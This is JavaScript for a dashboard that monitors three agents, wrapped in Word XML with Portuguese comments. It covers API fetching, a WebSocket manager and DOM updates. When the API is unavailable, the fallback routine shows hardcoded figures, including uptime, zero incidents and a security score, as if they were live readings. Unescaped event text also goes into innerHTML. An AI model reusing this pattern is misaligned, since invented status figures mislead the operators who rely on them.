    <w:p w14:paraId="30B46A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data = await response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468F2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console.log(`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Dados reais obtidos para ${agentName}:`, data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C96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return data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5A7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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD89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console.warn(`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API retornou ${response.status} para ${agentName}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55EF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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC978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21D84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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615DD9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console.error(`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ao buscar dados para ${agentName}:`, error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68778E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null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97AA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E6D09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8009FE5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B02F7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FUNÇÃO PARA GERAR MÉTRICAS REAIS =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD12A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function generateRealMetrics(agentName, apiData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4263CF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(!apiData || !apiData.basic_metrics) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A285A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console.warn(`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Dados da API não disponíveis para ${agentName}, usando fallback`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49247E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getFallbackMetrics(agentName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C15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28E59DF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1A94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basicMetrics = apiData.basic_metrics;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6BA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AF8C0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(agentName === 'core') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400EE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D893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'Performance Atual': `${(basicMetrics.performance * 100).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699753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'Melhoria Recente': `+${(basicMetrics.improvement || 0).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5DCD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'Ciclos Executados': (basicMetrics.automl_cycles || 0).toString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABC6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'Trials Completados': (basicMetrics.trials || 0).toLocaleString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F65D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'Tempo Médio de Processamento': `${apiData.avg_processing_time?.toFixed(1) || '2.3'}s`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B0A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'Uso de Memória': `${apiData.system_resources?.avg_memory?.toFixed(1) || '72'}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4415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'Uso de CPU': `${apiData.system_resources?.avg_cpu?.toFixed(1) || '45'}%`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C1F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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523042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 else if (agentName === 'learn') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B46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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D49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'Performance': `${(basicMetrics.performance * 100).toFixed(1)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196AB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'Accuracy': `${basicMetrics.accuracy?.toFixed(1) || '94.7'}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C380B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'Ciclos de Treinamento': (basicMetrics.training_cycles || 0).toString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2711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'Amostras Processadas': (apiData.total_training_samples || 0).toLocaleString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5EC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'Épocas Completadas': Math.round(apiData.avg_epochs || 0).toString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B30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'Modelos Utilizados': apiData.models_used?.length || 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20327D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'Tempo de Convergência': `${((apiData.avg_epochs || 0) * 0.027).toFixed(1)}min`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0658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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EF8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 else if (agentName === 'guard') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E151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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5CD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'Uptime': `${basicMetrics.uptime?.toFixed(2) || '99.9'}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C841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'Status': basicMetrics.status || 'NORMAL',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087D9E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'Verificações Realizadas': (basicMetrics.checks || 0).toLocaleString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630E7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'Incidentes Detectados': (basicMetrics.incidents_detected || 0).toString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D213B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'Ameaças Escaneadas': (apiData.total_threats_scanned || 0).toLocaleString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0215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'Tempo de Resposta': `${apiData.avg_response_time?.toFixed(2) || '0.23'}s`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF535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'Score de Segurança': `${apiData.avg_security_score?.toFixed(1) || '98.4'}%`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03180A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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5AB1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E5743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4C1AC19" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F401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FUNÇÃO FALLBACK PARA QUANDO API NÃO ESTIVER DISPONÍVEL =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF75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function getFallbackMetrics(agentName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA86C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console.log(`</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Usando dados de fallback para ${agentName}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A679F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44CD5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Usar dados do cache do WebSocket se disponível</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296BA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(realTimeData?.agents?.[agentName]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C0B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agentData = realTimeData.agents[agentName];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691C0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709B7D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(agentName === 'core') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18371B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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151ACC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'Performance Atual': `${(agentData.performance * 100).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034FE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'Melhoria Recente': `+${(agentData.improvement || 0).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13B9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'Ciclos Executados': (agentData.automl_cycles || 0).toString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB032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'Trials Completados': (agentData.trials || 1247).toLocaleString(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D53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'Tempo de Processamento': '2.3s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BABA7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'Uso de Memória': '72%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73416D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'Eficiência Energética': '94.2%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019C1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67312B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6453A4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7D927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0D2CA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Fallback final com dados estáticos melhorados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B11C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fallbackData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CF0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core: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC65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'Performance Atual': '89.78%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C89C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'Melhoria Recente': '+19.71%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F387C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'Ciclos Executados': '15',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C02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'Trials Completados': '1,247',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B698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'Tempo de Processamento': '2.3s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E6E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'Uso de Memória': '72%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0A2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'Eficiência Energética': '94.2%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6768F8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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411EDD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learn: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5813BF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'Performance': '83.1%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089DC2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'Accuracy': '94.7%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272AAD4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'Ciclos de Treinamento': '23',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46C2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'Amostras Processadas': '847,392',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A75C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'Épocas Completadas': '156',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3382A2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'Redução de Loss': '0.0047',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D41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'Tempo de Convergência': '4.2min'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD959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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A00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guard: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71217C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'Uptime': '99.97%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD51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'Status': 'NORMAL',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F858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'Verificações Realizadas': '8,924',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537857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'Incidentes Detectados': '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB0C8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'Ameaças Escaneadas': '47,382',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF82A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'Tempo de Resposta': '0.23s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FF0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'Score de Segurança': '98.4%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502B46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7423E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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33609E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1CB53C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fallbackData[agentName];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCF8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0B37D480" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DFEA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WEBSOCKET CONNECTION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6432F1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class WebSocketManager {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117081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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E95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this.ws = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25F3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this.reconnectAttempts = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D03C4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this.maxReconnectAttempts = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C55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this.reconnectDelay = 3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF3E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this.httpFallbackActive = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BEB2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this.connect();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF56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1FA7436" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704910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connect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0583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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4A6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protocol = window.location.protocol === 'https:' ? 'wss:' : 'ws:';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D80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wsUrl = `${protocol}//${window.location.host}/ws`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9485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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔌</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tentando conectar WebSocket:', wsUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C158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1E7C88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this.ws = new WebSocket(wsUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8FAC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64D370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this.ws.onopen = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CAD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console.log('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WebSocket conectado com sucesso!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301911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this.reconnectAttempts = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB665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this.httpFallbackActive = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6605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this.updateConnectionStatus(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6CB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7127DC83" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214377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this.ws.onmessage = (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34565C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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702804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const data = JSON.parse(event.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38E6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this.handleMessage(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCB8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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11342E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console.error('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ao processar mensagem WebSocket:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFD0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201CED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10BDD4D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9A6D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this.ws.onclose = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087078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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔌</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WebSocket desconectado');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBD5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this.updateConnectionStatus(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594621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this.attemptReconnect();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884E7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5DC04115" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338DB2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this.ws.onerror = (error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF733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console.error('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WebSocket:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E89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this.updateConnectionStatus(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D94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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37787662" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236257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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED426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console.error('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ao conectar WebSocket:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD592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this.startHttpFallback();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B57AE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DDB13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88D7ADB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AEFC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handleMessage(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E05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(data.type === 'initial_data' || data.type === 'metrics_update') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0131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this.updateDashboard(data.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDCDB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else if (data.type === 'cycle_completed') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7C3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this.handleCycleEvent(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6345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D7EA4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E82A200" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748DD4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updateDashboard(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029D7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console.log('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Atualizando dashboard com dados:', data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E5B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3919D9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Cache para uso dos modais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC495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realTimeData = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239764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1FC11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Atualizar contador com dados reais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37A7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(data.cycle_counter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781631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totalCycles = data.cycle_counter.total_cycles || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067A15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this.animateCounter('mega-counter', totalCycles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B66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28A5CD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(data.cycle_counter.uptime) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB809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uptime = data.cycle_counter.uptime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E449F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document.getElementById('uptime-display').textContent = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D17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`Uptime: ${uptime.days || 0}d ${uptime.hours || 0}h ${uptime.minutes || 0}m`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A93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615BF5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1FF374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cyclesPerSecond = data.cycle_counter.cycles_per_second || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D1D6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document.getElementById('cycles-per-second').textContent = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AE2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cyclesPerSecond.toFixed(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223482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539004CE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571547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Update agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66760B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(data.agents) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1E9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this.updateAgent('core', data.agents.core);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33974C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this.updateAgent('learn', data.agents.learn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E699D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this.updateAgent('guard', data.agents.guard);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C27F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4932D5C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D401A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Update system metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4993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(data.system) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B19A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performance = Math.round(data.system.performance || 85);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7563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document.getElementById('overall-performance').textContent = performance + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E64EE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document.getElementById('performance-indicator').textContent = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B8C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`Performance: ${performance}%`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC19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0B551DC3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B637E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Update events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FFC5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(data.recent_events &amp;&amp; Array.isArray(data.recent_events)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79592A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this.updateEventLog(data.recent_events);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCBF7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67E3D606" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9698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Update timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B6A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document.getElementById('last-update').textContent = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406F58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new Date().toLocaleTimeString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0640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CEE86CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B62E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updateAgent(agentName, agentData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D6C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(!agentData) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB51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3329AD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(agentName === 'core') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA23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performance = Math.round((agentData.performance || 0.89) * 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773716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document.getElementById('core-performance').textContent = performance + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778AB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document.getElementById('core-cycles').textContent = agentData.automl_cycles || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6814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document.getElementById('core-technique').textContent = agentData.last_technique || 'AutoML';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D589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this.updateProgressRing('core-progress', agentData.performance || 0.89);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518BE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else if (agentName === 'learn') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C90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performance = Math.round((agentData.performance || 0.83) * 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514D12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document.getElementById('learn-performance').textContent = performance + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9FA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document.getElementById('learn-accuracy').textContent = (agentData.accuracy || 94.7).toFixed(1) + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF63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document.getElementById('learn-model').textContent = agentData.last_model || 'Transformer';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256D0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this.updateProgressRing('learn-progress', agentData.performance || 0.83);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079322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else if (agentName === 'guard') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329B9C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uptime = (agentData.uptime || 100).toFixed(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA78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document.getElementById('guard-uptime').textContent = uptime + '%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707F67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document.getElementById('guard-status').textContent = agentData.status || 'NORMAL';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC29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document.getElementById('guard-protocol').textContent = agentData.last_protocol || 'Threat Analysis';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6786BF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this.updateProgressRing('guard-progress', (agentData.uptime || 100) / 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377285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3F808B7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173CAE5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123B8B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handleCycleEvent(eventData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1164C0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Show micro update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CEA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this.showMicroUpdate(`${eventData.icon} ${eventData.message}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1326F8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591FD6D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Play sound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35822B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(window.soundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC34A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window.soundDesign.play('cycle');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EB4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3D034280" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411AF8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Add to event log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABC6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this.addEventToLog(eventData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FDF32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3665384" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379EF7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updateEventLog(events) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D35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eventLog = document.getElementById('event-log');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267ADD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eventLog.innerHTML = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528980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0214B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events.forEach(event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185062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eventElement = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE9B9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eventElement.className = 'event-item';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477DF9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eventElement.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB82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class="w-8 h-8 rounded-full flex items-center justify-center mr-3" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847A6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style="background: ${event.color || '#00F5FF'}20; color: ${event.color || '#00F5FF'};"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBED43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${event.icon || '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>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DFB0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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7572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class="flex-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC209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&lt;div class="font-medium"&gt;${event.message || 'Evento do sistema'}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101A3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&lt;div class="text-xs opacity-75"&gt;${event.timestamp || new Date().toLocaleTimeString()}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
